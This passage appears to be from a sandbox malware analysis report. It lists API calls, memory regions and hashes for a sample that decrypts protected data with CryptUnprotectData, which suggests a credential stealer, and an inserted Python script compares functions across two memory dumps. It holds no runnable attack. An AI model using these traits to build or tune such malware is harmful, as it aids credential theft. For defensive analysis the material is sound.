                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,024551A5,00000000,00000000), ref: 0245A4E1
                                            • LocalFree.KERNEL32(?,?,?,?,024551A5,00000000,?), ref: 0245A4F6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID:
                                            • API String ID: 4291131564-0
                                            • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction ID: 70aff5809641f6a75b56b15cf0a6e2acb5b4b0f65e8912d5f34ba511fe28dcbc
                                            • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction Fuzzy Hash: 1111D274641308AFEB10CF64CC95FAA77B6FB88704F208149FD159B390C7B2AA40CB50
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                            • memcpy.MSVCRT(?,?,?), ref: 0040A316
                                            • LocalFree.KERNEL32(?), ref: 0040A323
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
                                            • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0245A53B
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0245A55A
                                            • memcpy.MSVCRT(?,?,?), ref: 0245A57D
                                            • LocalFree.KERNEL32(?), ref: 0245A58A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction ID: 8555f6d9584d36643b8f07d4f42cf775a71da2da3c1a795a7680d7c731ddf763
                                            • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction Fuzzy Hash: 8111A8B8A01219EFCB04DFA4D984AAEB7B5FF88304F108559ED1597350D730AA50CFA2
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009D0348,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,009D0348,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009D0348,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                            • wsprintfA.USER32 ref: 00417C47
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 362916592-0
                                            • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
                                            • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$GetProcAddress.$l
                                            • API String ID: 0-2784972518
                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction ID: ef04b08f49b47f73ac197ea453be697af2381266527df5cb0f9494033dee462b
                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction Fuzzy Hash: AF3139BA900619DFDB10CF99C880AAEBBF9FF48324F15504AD881A7315D771EA45CFA4
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: SystemTimelstrcpy
                                            • String ID:
                                            • API String ID: 62757014-0
                                            • Opcode ID: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                            • Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
                                            • Opcode Fuzzy Hash: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                            • Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                            • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(0041D1D8), ref: 0246D486
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                            • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
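The entries above repeat the same Opcode ID under two different memory dumps: the PE-backed image at offset 00400000 and the non-PE region at 02450000 (for example the CryptUnprotectData/LocalAlloc/memcpy/LocalFree function 7a2dd4ec… and the SetUnhandledExceptionFilter function 8b874fd8…). An analyst reading such a report wants to know whether the second region is a distinct payload or another copy of the same code. The script below is an added example, not Joe Sandbox's own tooling: it parses the report's function entries, lists the Opcode IDs seen in more than one region, and compares the call-site addresses of each shared function across the two regions. REPORT_ENTRIES is a constructed excerpt of the entries shown on this page, trimmed to the fields the script uses; the reading that a single constant displacement between matching call sites means the second region holds the same code relocated to a different address is the analyst's inference, not a statement the report itself makes.

```python
"""Cross-reference function fingerprints between two memory dumps of one process."""
import re
from collections import defaultdict

# Constructed excerpt of the Joe Sandbox function entries above: the image mapped
# at 0x00400000 (based on PE: true) and the region at 0x02450000 (based on PE: false).
REPORT_ENTRIES = """
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
• memcpy.MSVCRT(?,?,?), ref: 0040A316
• LocalFree.KERNEL32(?), ref: 0040A323
Memory Dump Source
• Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
• Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0245A53B
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0245A55A
• memcpy.MSVCRT(?,?,?), ref: 0245A57D
• LocalFree.KERNEL32(?), ref: 0245A58A
Memory Dump Source
• Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
• Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
• Instruction ID: 8555f6d9584d36643b8f07d4f42cf775a71da2da3c1a795a7680d7c731ddf763
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
Memory Dump Source
• Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
• Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
APIs
• SetUnhandledExceptionFilter.KERNEL32(0041D1D8), ref: 0246D486
Memory Dump Source
• Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
• Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
• Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
"""

# "Name.MODULE(args), ref: ADDR"; the parenthesised argument list is optional
# because some entries (e.g. wsprintfA.USER32 ref: ...) omit it.
CALL_RE = re.compile(r"•\s*([A-Za-z0-9_]+)\.[A-Z0-9_]+(?:\(.*\),)?\s*ref:\s*([0-9A-Fa-f]+)")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
OPCODE_RE = re.compile(r"Opcode ID:\s*([0-9a-f]{64})")
INSTR_RE = re.compile(r"Instruction ID:\s*([0-9a-f]{64})")


def parse_entries(text):
    """Split report text into one record per analysed function.

    An entry's fields arrive in a fixed order (API calls, then the dump source,
    then the IDs), so the Instruction ID line closes the current record.
    """
    entries, current = [], {"calls": []}
    for line in text.splitlines():
        line = line.strip()
        if "Part of subcall" in line:
            continue  # call site lives in a callee, not in this function
        if m := CALL_RE.search(line):
            current["calls"].append((m.group(1), int(m.group(2), 16)))
        elif m := OFFSET_RE.search(line):
            current["region"] = int(m.group(1), 16)
            current["based_on_pe"] = m.group(2) == "true"
        elif m := OPCODE_RE.search(line):
            current["opcode_id"] = m.group(1)
        elif m := INSTR_RE.search(line):
            current["instruction_id"] = m.group(1)
            entries.append(current)
            current = {"calls": []}
    return entries


def group_by_opcode(entries):
    """Map each Opcode ID to every entry that carries it."""
    by_opcode = defaultdict(list)
    for e in entries:
        by_opcode[e["opcode_id"]].append(e)
    return by_opcode


def shared_functions(entries):
    """Opcode IDs present in more than one memory region, with those regions sorted."""
    shared = {}
    for opcode_id, group in group_by_opcode(entries).items():
        regions = sorted({e["region"] for e in group})
        if len(regions) > 1:
            shared[opcode_id] = regions
    return shared


def relocation_deltas(entries, base_region, other_region):
    """Set of (other - base) differences between matching call sites of shared functions.

    One constant value across every pair means the other region contains the same
    code at a fixed displacement; several values point at genuinely different code.
    """
    deltas = set()
    for group in group_by_opcode(entries).values():
        base = [e for e in group if e["region"] == base_region]
        other = [e for e in group if e["region"] == other_region]
        if not base or not other:
            continue
        # First entry per region is enough for this excerpt; duplicates of one
        # function inside a single region would need a finer pairing.
        for (api_a, ref_a), (api_b, ref_b) in zip(base[0]["calls"], other[0]["calls"]):
            if api_a == api_b:
                deltas.add(ref_b - ref_a)
    return deltas


if __name__ == "__main__":
    parsed = parse_entries(REPORT_ENTRIES)
    for opcode_id, regions in shared_functions(parsed).items():
        print(opcode_id[:16], "seen in", [hex(r) for r in regions])
    print("call-site deltas:", [hex(d) for d in relocation_deltas(parsed, 0x400000, 0x2450000)])
```

Run against the excerpt, both shared functions show the same displacement between their call sites, so the 0x02450000 region can be treated as another copy of the code already analysed at 0x00400000 rather than a separate payload that needs its own reverse-engineering pass. On a full report, feed the whole function section to parse_entries and look for Opcode IDs whose deltas disagree; those are the places where the two regions actually diverge.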
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                            • Instruction ID: 792826b1ed95b049bd50ca4c190a89afab6b3c59b3270be19c96037be3d7d9f3
                                            • Opcode Fuzzy Hash: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                            • Instruction Fuzzy Hash: 9182D0B5A00F448FD365CF29C880B93B7E1BF5A300F548A6ED9EA8B751DB30A545CB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                            • Instruction ID: 41feed176288303efdbc143e8e81b90c8045c5f85f3f2342fc657b2b74dce337
                                            • Opcode Fuzzy Hash: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                            • Instruction Fuzzy Hash: 8E320275E04619CFCB54CF6CC8807AEB7B2BF89314F24922ED569AB391D7349842CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                            • Instruction ID: ec64528b41181b02b9d4d6018ae186261496842bfee5b3ebee320809df0c6c07
                                            • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                            • Instruction Fuzzy Hash: 39427C716046418FCB25CF1DC494726BFE2BF86314F188A6FD48A8B792D735E886CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                            • Instruction ID: b8bb7e3ed8c889994bbff9fb2cea41eaef35b45be94378eab556ec99e7a44d44
                                            • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                            • Instruction Fuzzy Hash: 0202E875E0022A8FCB11CE7DC8906AFB7A2AF99354F25831FE855B7350D771AD828790
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                            • Instruction ID: b9e97a4029905f5227f4ca70fbedc906c6a0ed2e93fb19ec63b474154794938b
                                            • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                            • Instruction Fuzzy Hash: C0F179B26086914BC71E8A1984F09BD7FD39BA9104F4E86ADFCD70F393D924DA01DB61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                            • Instruction ID: 388c37dd80349f6e166dc6fafd0cbb33cd1497cc64490fd4cfc56f462203be89
                                            • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                            • Instruction Fuzzy Hash: 8ED17573F11A294BEB08CE99DC913ADB6E2EBD8350F19423ED916F7381D6B85D018790
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                            • Instruction ID: d93ec5bb590fa5ba97ceeb0176ec567f6a3cdaae188fff0a351af0942084eaa6
                                            • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                            • Instruction Fuzzy Hash: FB027974E006588FCB16CFA8C4905EDBBB6FF9D310F54815AE8996B355C730AA91CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                            • Instruction ID: 83c6b8fb45ca311d1c4269372371e2820b93d2503d9a942d61c5c2c5da4737ef
                                            • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                            • Instruction Fuzzy Hash: DD022475E006198FCF15CF98C4909ADB7B6FF98314F25816EE809AB354D731AA92CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                            • Instruction ID: 9884acfade966dbfb4803b3de7d7e9ac54b68386d69c3b3365301312e3f0405b
                                            • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                            • Instruction Fuzzy Hash: CDC14C7AE29B915BD313873DD842265F354AFE7294F15D72FFCE472A82FB2092814204
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                            • Instruction ID: 06745d917cdf9b937a702e4bb291ca13faf01d703232ad5690338e0df1fc945c
                                            • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                            • Instruction Fuzzy Hash: 2FD13470600B50CFD726CF29C484BA7B7E1BF49304F14896EC89A8BB51DB35E545CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                            • Instruction ID: f1e19d4c2def0f58666d1ef58d7a217b2d2b64ada050915b40bab9737cd3cc72
                                            • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                            • Instruction Fuzzy Hash: 21B18172E083515BD308CF25C89176FF7E2EFC8310F1AC93EA89997291D778D9459A82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                            • Instruction ID: e092d78019449560a7e1e9b7bc75e2868a7bd8d830167f7ec304b9aeb055080d
                                            • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                            • Instruction Fuzzy Hash: E3B1A272A083119BD718CF25C49176BFBE2EFC8310F1AC93EF89997291D774D9419A82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                            • Instruction ID: 8f3cdd34a6645eaf316ddc22565298507f54208ebbd17d22b94e8d361e1ff2e9
                                            • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                            • Instruction Fuzzy Hash: 01B1F671A197118FD706EE3DC491219F7E1AFD6280F51C72FE899B7662EB31E8828740
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                            • Instruction ID: 2563fd8d37c67ca54cc0c28e0ef626253cc6e060576e1226b0e36bffb54d834e
                                            • Opcode Fuzzy Hash: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                            • Instruction Fuzzy Hash: 7191C479B002159BEF94DE6CC880B7AB3A2AF55704F2940AED91DAB387D331D841C795
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                            • Instruction ID: 2ec9523fb7c3cd3a7ddb6e9ee7324e521fbda421bd7c51a4be902d8d694440f7
                                            • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                            • Instruction Fuzzy Hash: 47B13D71611608DFD715CF28C49AB657BE0FF45368F25865AE89ACF3A1C335E982CB40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
